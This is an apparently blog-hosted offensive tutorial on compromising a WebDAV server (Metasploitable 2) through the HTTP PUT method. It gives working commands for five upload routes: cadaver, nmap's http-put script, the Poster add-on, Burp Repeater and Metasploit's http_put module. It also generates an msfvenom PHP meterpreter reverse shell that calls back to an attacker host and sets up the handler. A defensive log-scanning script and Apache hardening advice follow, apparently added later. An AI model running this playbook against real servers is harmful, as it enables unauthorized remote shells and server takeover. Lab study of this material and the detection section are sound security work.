5 Ways to Exploit a PUT Vulnerability in a Web Server

Today's article is about exploiting the HTTP PUT method through various techniques. In the previous article we looked at the actions performed by the different HTTP methods, where I described the role of the PUT method, which allows a client to upload a file to the server. Now I will take advantage of this method to upload a malicious file and compromise the server.

Target: Metasploitable 2

Attacker: Kali Linux

Let’s Begin!!!!

Boot up your Kali Linux, open Firefox, type the victim IP 192.168.1.4 in the URL bar and click on WEBDAV. Here you can see it is showing only the parent directory. Now open a terminal to execute the following commands.

First of all, make sure the PUT method is allowed by the web server; to confirm this we scan the target with nikto.

nikto -h http://192.168.1.4/dav

The highlighted part of the output shows that the PUT method is allowed. Now it is time to hack the server by uploading a malicious PHP file using the following techniques.

Prepare the malicious file that you will upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with a .php extension. I have saved the backdoor as shell.php on the desktop and will later browse to this file to upload it to the web server.

Now load the Metasploit Framework by typing msfconsole in a new terminal and start multi/handler.

CADAVER

Cadaver, which is installed in Kali, is a command-line tool that supports uploading and downloading files over WebDAV.

Connect to the host URL where you want to upload your file using the first command given below.

cadaver http://192.168.1.4/dav/

Now you are inside the victim's directory. Upload shell.php by executing the command below; these two commands let you upload your file onto the target machine.

put /root/Desktop/shell.php

To verify whether the file was uploaded, open the URL 192.168.1.4/dav in the browser. Congrats!!! We have got our file shell.php on the web server.

Simultaneously, open Metasploit and use multi/handler. When it is ready, go back to the uploaded shell.php file and click on it.

msf > use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.1.5

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter > sysinfo

It will give you a meterpreter session.

NMAP

The http-put NSE script uploads a local file to a remote web server using the HTTP PUT method. You must specify the filename and URL path with NSE arguments. Prepare the malicious file nmap.php that you want to upload.

nmap -p 80 192.168.1.4 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'

The result shows that nmap.php was uploaded successfully; now let's check it.

Again type the same URL, 192.168.1.4/dav, in the browser. Yes, we have got our file nmap.php on the web server.

Simultaneously, open Metasploit and use multi/handler; then go back to the uploaded nmap.php file and run it.

It will also give you a meterpreter session.

POSTER

Install the Poster plug-in from Firefox Add-ons. Poster lets you perform HTTP requests with methods such as GET, POST, PUT and DELETE. Prepare the malicious file poster.php that you will upload. Click on Tools in the menu bar, then click on Poster in the drop-down menu. The following dialog box will open. Here, type the URL as shown in the screenshot, browse to the file that you will upload and click on the PUT option. This will show you that the PUT method is allowed, which means you can upload through it.

Open 192.168.1.4/dav in the browser. We got our file poster.php on the web server.

Likewise, run multi/handler; then go back to the uploaded poster.php file and click on it. A meterpreter session will open again.

BURP SUITE

Start Burp Suite and don't forget to set your browser's manual proxy. Now open the Proxy tab and click the "Intercept is on" button to capture the request to the target. When this is done you will see the captured request in the Intercept window.

Now right-click in this window and a list of options will appear. Click on "Send to Repeater".

Look at the screenshot: here you will find two panels, left and right, for the request and the response respectively.

The GET method is present in the request header and we need the PUT method to upload a file. Here I am going to replace this method with PUT. Prepare the malicious file burp.php that you need to upload.

Type PUT /dav/burp.php HTTP/1.1 in the header; this will upload the burp.php file under the dav directory through a PUT request. Then paste the malicious PHP code, from <?php to die(), after Cache-Control. Please follow the screenshot.

Open the same URL, 192.168.1.4/dav, in the browser again. Again we have got our burp.php file on the web server.

Now repeat the same process for a meterpreter session in Metasploit and we get the victim's session again.

METASPLOIT

This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If FILENAME isn't specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.

msf > use auxiliary/scanner/http/http_put

msf auxiliary(http_put) > set rhosts 192.168.1.4

msf auxiliary(http_put) > set payload php/meterpreter/reverse_tcp

msf auxiliary(http_put) > set path /dav/

msf auxiliary(http_put) > set filename meta.php

msf auxiliary(http_put) > set filedata file://root/Desktop/meta.php

msf auxiliary(http_put) > exploit

Although the output says 192.168.1.4 does not exist and reports an error in uploading, the "Index of /dav" page in Firefox clearly shows that meta.php has been uploaded.

Open the same URL, 192.168.1.4/dav, in the browser. Last but not least, we have again got our file meta.php on the web server, which means Metasploit's message "the upload probably failed" is not true.
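Whichever client does the uploading, the server's access log records each of the five techniques above as a PUT against /dav/, so that is what a defender should alert on. The following is an added detection example, not part of the original article: it parses constructed Apache combined-format log lines (the IPs, timestamps and user agents are made up) and grades every write-method request, treating a successful PUT of a server-executable extension such as .php as critical.

```python
import re

# Constructed Apache combined-format access log (sample data, not from the original
# page). Every upload path the article walks through lands in the server log as a
# PUT against /dav/, so that is what a defender looks for.
SAMPLE_LOG = """\
192.168.1.5 - - [10/May/2016:10:00:05 +0000] "OPTIONS /dav/ HTTP/1.1" 200 - "-" "Nikto"
192.168.1.5 - - [10/May/2016:10:01:10 +0000] "PUT /dav/shell.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
192.168.1.5 - - [10/May/2016:10:02:20 +0000] "PUT /dav/nmap.php HTTP/1.1" 201 0 "-" "Nmap Scripting Engine"
192.168.1.5 - - [10/May/2016:10:03:30 +0000] "PUT /dav/notes.txt HTTP/1.1" 201 0 "-" "Mozilla/5.0"
192.168.1.5 - - [10/May/2016:10:04:40 +0000] "PUT /dav/burp.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.168.1.5 - - [10/May/2016:10:05:50 +0000] "GET /dav/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)
# Extensions the server would execute if a PUT drops them under the docroot.
EXEC_EXT = (".php", ".php3", ".php5", ".phtml", ".jsp", ".asp", ".aspx", ".cgi", ".pl")
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Severity for one parsed entry, or None for a read-only request."""
    method, status = entry["method"], int(entry["status"])
    if method not in WRITE_METHODS:
        return None
    succeeded = 200 <= status < 300          # 201 Created / 204 No Content: the write stuck
    executable = entry["path"].lower().endswith(EXEC_EXT)
    if method == "PUT" and executable:
        return "critical" if succeeded else "high"   # webshell landed / was attempted
    return "medium" if succeeded else "low"          # other write: defacement, staging, probe

def scan_log(text):
    """Return (severity, method, path, status, client_ip) for each write-method request."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        sev = classify(entry)
        if sev:
            findings.append((sev, entry["method"], entry["path"], int(entry["status"]), entry["ip"]))
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%-8s %-4s %-18s %d from %s" % f)
```

On Apache the underlying misconfiguration is a `Dav On` directory that the PHP handler also serves with write methods left anonymous; wrapping those methods in a `<LimitExcept GET HEAD OPTIONS>` block with `Require valid-user`, or disabling the handler for the DAV path, removes the condition this log check hunts for.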

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.
